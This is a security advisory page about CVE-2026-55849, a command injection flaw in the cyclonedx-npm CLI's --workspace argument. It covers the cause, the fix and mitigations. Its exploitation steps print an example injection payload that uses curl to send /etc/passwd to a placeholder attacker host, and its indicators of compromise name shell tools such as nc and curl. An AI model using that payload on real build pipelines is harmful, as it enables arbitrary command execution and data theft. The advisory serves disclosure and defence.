CVE-2026-55849
JavaScript Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-55849 is a shell/command injection vulnerability in the @cyclonedx/cyclonedx-npm npm package, titled "Shell Injection via Unsanitized --workspace Argument." It affects versions >= 2.1.0 and < 5.0.0 of the package. The vulnerability was discovered by researcher fortress07, coordinated by maintainer jkowalleck, and published to the GitHub Advisory Database on June 19, 2026. It carries a CVSS v4.0 base score of 8.5 (High) (GitHub Advisory, CycloneDX Advisory).

Détails techniques

The root cause (CWE-78: OS Command Injection) lies in how cyclonedx-npm handles the --workspace CLI argument in its fallback execution path. When the environment variable npm_execpath is set, the tool invokes npm directly and no injection occurs. However, when npm_execpath is unset or empty, the tool falls back to spawning a subshell and interpolates the user-supplied --workspace value directly into the shell command string without escaping or sanitization. Shell metacharacters such as ;, &&, and | are therefore interpreted by the shell, allowing an attacker who controls the --workspace value to break out of the intended command context and execute arbitrary OS commands. The fix in PR #1476 replaced the unsafe execSync('npm ' + ...) shell invocation with execFileSync, resolving the npm executable path explicitly and eliminating the subshell fallback (GitHub Advisory, Fix PR #1476).

Impact

Successful exploitation allows an attacker to execute arbitrary OS commands with the privileges of the user running the cyclonedx-npm CLI. Potential consequences include arbitrary command execution, data exfiltration, modification or destruction of files accessible to the invoking user, and local privilege escalation depending on the deployment context. The impact is scoped to the vulnerable system; subsequent/downstream systems are not directly affected per the CVSS assessment (GitHub Advisory, CycloneDX Advisory).

Étapes d’exploitation

  1. Identify a vulnerable target: Confirm the target environment is running @cyclonedx/cyclonedx-npm version >= 2.1.0 and < 5.0.0, and that the npm_execpath environment variable is unset or empty in the execution context.
  2. Gain influence over the --workspace argument: Position the attacker-controlled value as the --workspace argument — this could occur via a malicious npm workspace name in a package.json, a CI/CD pipeline configuration that passes user-controlled input, or social engineering.
  3. Craft a malicious workspace value: Construct a workspace name containing shell metacharacters to inject additional commands, for example: my-workspace; <malicious-command> or my-workspace && curl http://attacker.com/exfil?data=$(cat /etc/passwd).
  4. Trigger CLI execution: Cause the vulnerable cyclonedx-npm CLI to be invoked with the crafted --workspace value (e.g., cyclonedx-npm --workspace "my-workspace; <malicious-command>").
  5. Achieve arbitrary command execution: The injected shell metacharacters are interpreted by the subshell, executing the attacker's payload with the privileges of the user running the CLI (GitHub Advisory, CycloneDX Advisory).

Indicateurs de compromis

  • Process: Unexpected child processes spawned by the cyclonedx-npm Node.js process (e.g., sh, bash, curl, wget, python, nc) that are not consistent with normal SBOM generation activity.
  • Logs: Shell or audit logs showing command execution with unusual arguments immediately following or alongside cyclonedx-npm invocations; presence of shell metacharacters (;, &&, |) in process argument lists associated with cyclonedx-npm.
  • Network: Unexpected outbound network connections originating from the host running cyclonedx-npm, particularly to external IPs or domains not associated with npm registries.
  • File System: Newly created or modified files in directories writable by the user running cyclonedx-npm, especially scripts, cron jobs, or SSH authorized_keys modifications made around the time of tool invocation.

Atténuation et solutions de contournement

The primary remediation is to upgrade @cyclonedx/cyclonedx-npm to version 5.0.0 or later, which eliminates the vulnerable subshell fallback by resolving the npm executable path explicitly and using execFileSync (v5.0.0 Release, Fix PR #1476). As a temporary workaround for environments that cannot immediately upgrade, ensure the npm_execpath environment variable is set before invoking the tool, which prevents the vulnerable fallback code path from being triggered. Additionally, avoid passing untrusted or user-controlled values to the --workspace option (GitHub Advisory).

Réactions de la communauté

The vulnerability was reported by security researcher fortress07 and coordinated by CycloneDX maintainer jkowalleck, who led the fix effort. The fix required cross-platform consideration, as an initial proposed fix from the reporter broke the tool on Windows, prompting a more robust solution using explicit npm executable resolution. The v5.0.0 release was tagged as a breaking change due to the reworked npm handling behavior (Fix PR #1476, v5.0.0 Release). No broader media coverage or significant social media discussion has been identified at this time.

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté JavaScript Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-54527CRITICAL9.3
  • JavaScript logoJavaScript
  • jupyterlab-git
NonOuiJul 08, 2026
CVE-2026-57480HIGH8.7
  • JavaScript logoJavaScript
  • parse-server
NonOuiJul 08, 2026
CVE-2026-55849HIGH8.5
  • JavaScript logoJavaScript
  • @cyclonedx/cyclonedx-npm
NonOuiJul 08, 2026
CVE-2026-57481LOW2.3
  • JavaScript logoJavaScript
  • parse-server
NonOuiJul 08, 2026
CVE-2026-55778LOW2.1
  • JavaScript logoJavaScript
  • parse-server
NonOuiJul 08, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités